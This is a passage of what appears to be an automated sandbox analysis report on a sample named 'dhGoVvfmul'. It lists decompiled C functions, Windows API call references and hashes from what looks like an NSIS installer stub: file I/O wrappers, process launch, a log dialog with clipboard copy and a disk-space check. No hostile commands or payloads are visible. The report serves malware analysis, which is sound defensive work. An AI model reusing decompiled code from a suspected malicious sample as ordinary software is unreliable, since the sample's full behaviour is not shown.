                          • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                          • GetLastError.KERNEL32 ref: 00405AC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                          • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                          • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                          • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040607A(void* _a4, void* _a8, long _a12) {
                          				int _t7;
                          				long _t11;
                          
                          				_t11 = _a12;
                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                          				if(_t7 == 0 || _t11 != _a12) {
                          					return 0;
                          				} else {
                          					return 1;
                          				}
                          			}





                          0x0040607e
                          0x0040608e
                          0x00406096
                          0x00000000
                          0x0040609d
                          0x00000000
                          0x0040609f

                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                          • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                          • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004060A9(void* _a4, void* _a8, long _a12) {
                          				int _t7;
                          				long _t11;
                          
                          				_t11 = _a12;
                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                          				if(_t7 == 0 || _t11 != _a12) {
                          					return 0;
                          				} else {
                          					return 1;
                          				}
                          			}





                          0x004060ad
                          0x004060bd
                          0x004060c5
                          0x00000000
                          0x004060cc
                          0x00000000
                          0x004060ce

                          APIs
                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                          • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                          • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004034AF(long _a4) {
                          				long _t2;
                          
                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                          				return _t2;
                          			}




                          0x004034bd
                          0x004034c3

                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00401FA4() {
                          				void* _t9;
                          				char _t13;
                          				void* _t15;
                          				void* _t17;
                          				void* _t20;
                          				void* _t22;
                          
                          				_t19 = E00402DA6(_t15);
                          				E00405569(0xffffffeb, _t7);
                          				_t9 = E00405AEA(_t19); // executed
                          				_t20 = _t9;
                          				if(_t20 == _t15) {
                          					 *((intOrPtr*)(_t22 - 4)) = 1;
                          				} else {
                          					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                          						_t13 = E0040697F(_t17, _t20); // executed
                          						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                          							if(_t13 != _t15) {
                          								 *((intOrPtr*)(_t22 - 4)) = 1;
                          							}
                          						} else {
                          							E0040644E( *((intOrPtr*)(_t22 - 0xc)), _t13);
                          						}
                          					}
                          					_push(_t20);
                          					CloseHandle();
                          				}
                          				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
                          				return 0;
                          			}









                          0x00401faa
                          0x00401faf
                          0x00401fb5
                          0x00401fba
                          0x00401fbe
                          0x0040292e
                          0x00401fc4
                          0x00401fc7
                          0x00401fca
                          0x00401fd2
                          0x00401fe1
                          0x00401fe3
                          0x00401fe3
                          0x00401fd4
                          0x00401fd8
                          0x00401fd8
                          0x00401fd2
                          0x00401fea
                          0x00401feb
                          0x00401feb
                          0x00402c2d
                          0x00402c39

                          APIs
                            • Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                            • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                            • Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                            • Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                            • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                            • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                            • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                            • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE ref: 00405B13
                            • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                            • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                            • Part of subcall function 0040697F: GetExitCodeProcess.KERNELBASE ref: 004069B2
                            • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                          • String ID:
                          • API String ID: 2972824698-0
                          • Opcode ID: 7a4d027f099effcba9a875e41588830efd81f609a84ab4e326c73c2aaae1a309
                          • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                          • Opcode Fuzzy Hash: 7a4d027f099effcba9a875e41588830efd81f609a84ab4e326c73c2aaae1a309
                          • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                          				struct HWND__* _v8;
                          				long _v12;
                          				struct tagRECT _v28;
                          				void* _v36;
                          				signed int _v40;
                          				int _v44;
                          				int _v48;
                          				signed int _v52;
                          				int _v56;
                          				void* _v60;
                          				void* _v68;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				struct HWND__* _t94;
                          				long _t95;
                          				int _t100;
                          				void* _t108;
                          				intOrPtr _t130;
                          				struct HWND__* _t134;
                          				int _t156;
                          				int _t159;
                          				struct HMENU__* _t164;
                          				struct HWND__* _t168;
                          				struct HWND__* _t169;
                          				int _t171;
                          				void* _t172;
                          				short* _t173;
                          				short* _t175;
                          				int _t177;
                          
                          				_t169 =  *0x429204;
                          				_t156 = 0;
                          				_v8 = _t169;
                          				if(_a8 != 0x110) {
                          					if(_a8 == 0x405) {
                          						CloseHandle(CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                          					}
                          					if(_a8 != 0x111) {
                          						L17:
                          						_t171 = 1;
                          						if(_a8 != 0x404) {
                          							L25:
                          							if(_a8 != 0x7b) {
                          								goto L20;
                          							}
                          							_t94 = _v8;
                          							if(_a12 != _t94) {
                          								goto L20;
                          							}
                          							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                          							_a8 = _t95;
                          							if(_t95 <= _t156) {
                          								L36:
                          								return 0;
                          							}
                          							_t164 = CreatePopupMenu();
                          							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
                          							_t100 = _a16;
                          							_t159 = _a16 >> 0x10;
                          							if(_a16 == 0xffffffff) {
                          								GetWindowRect(_v8,  &_v28);
                          								_t100 = _v28.left;
                          								_t159 = _v28.top;
                          							}
                          							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                          								_v60 = _t156;
                          								_v48 = 0x423708;
                          								_v44 = 0x1000;
                          								_a4 = _a8;
                          								do {
                          									_a4 = _a4 - 1;
                          									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                          								} while (_a4 != _t156);
                          								OpenClipboard(_t156);
                          								EmptyClipboard();
                          								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                          								_a4 = _t108;
                          								_t172 = GlobalLock(_t108);
                          								do {
                          									_v48 = _t172;
                          									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                          									 *_t173 = 0xd;
                          									_t175 = _t173 + 2;
                          									 *_t175 = 0xa;
                          									_t172 = _t175 + 2;
                          									_t156 = _t156 + 1;
                          								} while (_t156 < _a8);
                          								GlobalUnlock(_a4);
                          								SetClipboardData(0xd, _a4);
                          								CloseClipboard();
                          							}
                          							goto L36;
                          						}
                          						if( *0x4291ec == _t156) {
                          							ShowWindow( *0x42a228, 8);
                          							if( *0x42a2ac == _t156) {
                          								E00405569( *((intOrPtr*)( *0x4226e0 + 0x34)), _t156);
                          							}
                          							E0040443C(_t171);
                          							goto L25;
                          						}
                          						 *0x421ed8 = 2;
                          						E0040443C(0x78);
                          						goto L20;
                          					} else {
                          						if(_a12 != 0x403) {
                          							L20:
                          							return E004044CA(_a8, _a12, _a16);
                          						}
                          						ShowWindow( *0x4291f0, _t156);
                          						ShowWindow(_t169, 8);
                          						E00404498(_t169);
                          						goto L17;
                          					}
                          				}
                          				_v52 = _v52 | 0xffffffff;
                          				_v40 = _v40 | 0xffffffff;
                          				_t177 = 2;
                          				_v60 = _t177;
                          				_v56 = 0;
                          				_v48 = 0;
                          				_v44 = 0;
                          				asm("stosd");
                          				asm("stosd");
                          				_t130 =  *0x42a230;
                          				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                          				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                          				 *0x4291f0 = GetDlgItem(_a4, 0x403);
                          				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
                          				_t134 = GetDlgItem(_a4, 0x3f8);
                          				 *0x429204 = _t134;
                          				_v8 = _t134;
                          				E00404498( *0x4291f0);
                          				 *0x4291f4 = E00404DF1(4);
                          				 *0x42920c = 0;
                          				GetClientRect(_v8,  &_v28);
                          				_v52 = _v28.right - GetSystemMetrics(_t177);
                          				SendMessageW(_v8, 0x1061, 0,  &_v60);
                          				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                          				if(_a8 >= 0) {
                          					SendMessageW(_v8, 0x1001, 0, _a8);
                          					SendMessageW(_v8, 0x1026, 0, _a8);
                          				}
                          				if(_a12 >= _t156) {
                          					SendMessageW(_v8, 0x1024, _t156, _a12);
                          				}
                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                          				_push(0x1b);
                          				E00404463(_a4);
                          				if(( *0x42a238 & 0x00000003) != 0) {
                          					ShowWindow( *0x4291f0, _t156);
                          					if(( *0x42a238 & 0x00000002) != 0) {
                          						 *0x4291f0 = _t156;
                          					} else {
                          						ShowWindow(_v8, 8);
                          					}
                          					E00404498( *0x4291e8);
                          				}
                          				_t168 = GetDlgItem(_a4, 0x3ec);
                          				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                          				if(( *0x42a238 & 0x00000004) != 0) {
                          					SendMessageW(_t168, 0x409, _t156, _a12);
                          					SendMessageW(_t168, 0x2001, _t156, _a8);
                          				}
                          				goto L36;
                          			}

































                          0x004056b0
                          0x004056b6
                          0x004056c0
                          0x004056c3
                          0x00405859
                          0x0040587d
                          0x0040587d
                          0x00405890
                          0x004058ae
                          0x004058b0
                          0x004058b8
                          0x0040590e
                          0x00405912
                          0x00000000
                          0x00000000
                          0x00405914
                          0x0040591a
                          0x00000000
                          0x00000000
                          0x00405924
                          0x0040592c
                          0x0040592f
                          0x00405a31
                          0x00000000
                          0x00405a31
                          0x0040593e
                          0x00405949
                          0x00405952
                          0x0040595d
                          0x00405960
                          0x00405969
                          0x0040596f
                          0x00405972
                          0x00405972
                          0x0040598a
                          0x00405993
                          0x00405996
                          0x0040599d
                          0x004059a4
                          0x004059ac
                          0x004059ac
                          0x004059c3
                          0x004059c3
                          0x004059ca
                          0x004059d0
                          0x004059dc
                          0x004059e3
                          0x004059ec
                          0x004059ee
                          0x004059f1
                          0x00405a00
                          0x00405a03
                          0x00405a09
                          0x00405a0a
                          0x00405a10
                          0x00405a11
                          0x00405a12
                          0x00405a1a
                          0x00405a25
                          0x00405a2b
                          0x00405a2b
                          0x00000000
                          0x0040598a
                          0x004058c0
                          0x004058f0
                          0x004058f8
                          0x00405903
                          0x00405903
                          0x00405909
                          0x00000000
                          0x00405909
                          0x004058c4
                          0x004058ce
                          0x00000000
                          0x00405892
                          0x00405898
                          0x004058d3
                          0x00000000
                          0x004058dc
                          0x004058a1
                          0x004058a6
                          0x004058a9
                          0x00000000
                          0x004058a9
                          0x00405890
                          0x004056c9
                          0x004056cd
                          0x004056d5
                          0x004056d9
                          0x004056dc
                          0x004056df
                          0x004056e2
                          0x004056e5
                          0x004056e6
                          0x004056e7
                          0x00405700
                          0x00405703
                          0x0040570d
                          0x0040571c
                          0x00405724
                          0x0040572c
                          0x00405731
                          0x00405734
                          0x00405740
                          0x00405749
                          0x00405752
                          0x00405774
                          0x0040577a
                          0x0040578b
                          0x00405790
                          0x0040579e
                          0x004057ac
                          0x004057ac
                          0x004057b1
                          0x004057bf
                          0x004057bf
                          0x004057c4
                          0x004057c7
                          0x004057cc
                          0x004057d8
                          0x004057e1
                          0x004057ee
                          0x004057fd
                          0x004057f0
                          0x004057f5
                          0x004057f5
                          0x00405809
                          0x00405809
                          0x0040581d
                          0x00405826
                          0x0040582f
                          0x0040583f
                          0x0040584b
                          0x0040584b
                          0x00000000

                          APIs
                          • GetDlgItem.USER32 ref: 00405706
                          • GetDlgItem.USER32 ref: 00405715
                          • GetClientRect.USER32(?,?), ref: 00405752
                          • GetSystemMetrics.USER32 ref: 00405759
                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                          • ShowWindow.USER32(?,00000008), ref: 004057F5
                          • GetDlgItem.USER32 ref: 00405816
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                          • GetDlgItem.USER32 ref: 00405724
                            • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                          • GetDlgItem.USER32 ref: 00405868
                          • CreateThread.KERNEL32 ref: 00405876
                          • CloseHandle.KERNEL32(00000000), ref: 0040587D
                          • ShowWindow.USER32(00000000), ref: 004058A1
                          • ShowWindow.USER32(?,00000008), ref: 004058A6
                          • ShowWindow.USER32(00000008), ref: 004058F0
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                          • CreatePopupMenu.USER32 ref: 00405935
                          • AppendMenuW.USER32 ref: 00405949
                          • GetWindowRect.USER32 ref: 00405969
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                          • OpenClipboard.USER32(00000000), ref: 004059CA
                          • EmptyClipboard.USER32 ref: 004059D0
                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                          • GlobalLock.KERNEL32 ref: 004059E6
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                          • SetClipboardData.USER32 ref: 00405A25
                          • CloseClipboard.USER32 ref: 00405A2B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: {
                          • API String ID: 590372296-366298937
                          • Opcode ID: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
                          • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                          • Opcode Fuzzy Hash: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
                          • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				signed int _v12;
                          				long _v16;
                          				long _v20;
                          				long _v24;
                          				char _v28;
                          				intOrPtr _v32;
                          				long _v36;
                          				char _v40;
                          				unsigned int _v44;
                          				signed int _v48;
                          				WCHAR* _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				WCHAR* _v72;
                          				void _v76;
                          				struct HWND__* _v80;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t82;
                          				long _t87;
                          				short* _t89;
                          				void* _t95;
                          				signed int _t96;
                          				int _t109;
                          				signed short _t114;
                          				signed int _t118;
                          				struct HWND__** _t122;
                          				intOrPtr* _t138;
                          				WCHAR* _t146;
                          				unsigned int _t150;
                          				signed int _t152;
                          				unsigned int _t156;
                          				signed int _t158;
                          				signed int* _t159;
                          				signed int* _t160;
                          				struct HWND__* _t166;
                          				struct HWND__* _t167;
                          				int _t169;
                          				unsigned int _t197;
                          
                          				_t156 = __edx;
                          				_t82 =  *0x4226e0;
                          				_v32 = _t82;
                          				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                          				if(_a8 == 0x40b) {
                          					E00405B4B(0x3fb, _t146);
                          					E0040678E(_t146);
                          				}
                          				_t167 = _a4;
                          				if(_a8 != 0x110) {
                          					L8:
                          					if(_a8 != 0x111) {
                          						L20:
                          						if(_a8 == 0x40f) {
                          							L22:
                          							_v8 = _v8 & 0x00000000;
                          							_v12 = _v12 & 0x00000000;
                          							E00405B4B(0x3fb, _t146);
                          							if(E00405EDE(_t186, _t146) == 0) {
                          								_v8 = 1;
                          							}
                          							E00406507(0x4216d8, _t146);
                          							_t87 = E004068D4(1);
                          							_v16 = _t87;
                          							if(_t87 == 0) {
                          								L30:
                          								E00406507(0x4216d8, _t146);
                          								_t89 = E00405E81(0x4216d8);
                          								_t158 = 0;
                          								if(_t89 != 0) {
                          									 *_t89 = 0;
                          								}
                          								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                          									goto L35;
                          								} else {
                          									_t169 = 0x400;
                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                          									asm("cdq");
                          									_v48 = _t109;
                          									_v44 = _t156;
                          									_v12 = 1;
                          									goto L36;
                          								}
                          							} else {
                          								_t159 = 0;
                          								if(0 == 0x4216d8) {
                          									goto L30;
                          								} else {
                          									goto L26;
                          								}
                          								while(1) {
                          									L26:
                          									_t114 = _v16(0x4216d8,  &_v48,  &_v28,  &_v40);
                          									if(_t114 != 0) {
                          										break;
                          									}
                          									if(_t159 != 0) {
                          										 *_t159 =  *_t159 & _t114;
                          									}
                          									_t160 = E00405E22(0x4216d8);
                          									 *_t160 =  *_t160 & 0x00000000;
                          									_t159 = _t160;
                          									 *_t159 = 0x5c;
                          									if(_t159 != 0x4216d8) {
                          										continue;
                          									} else {
                          										goto L30;
                          									}
                          								}
                          								_t150 = _v44;
                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                          								_v44 = _t150 >> 0xa;
                          								_v12 = 1;
                          								_t158 = 0;
                          								__eflags = 0;
                          								L35:
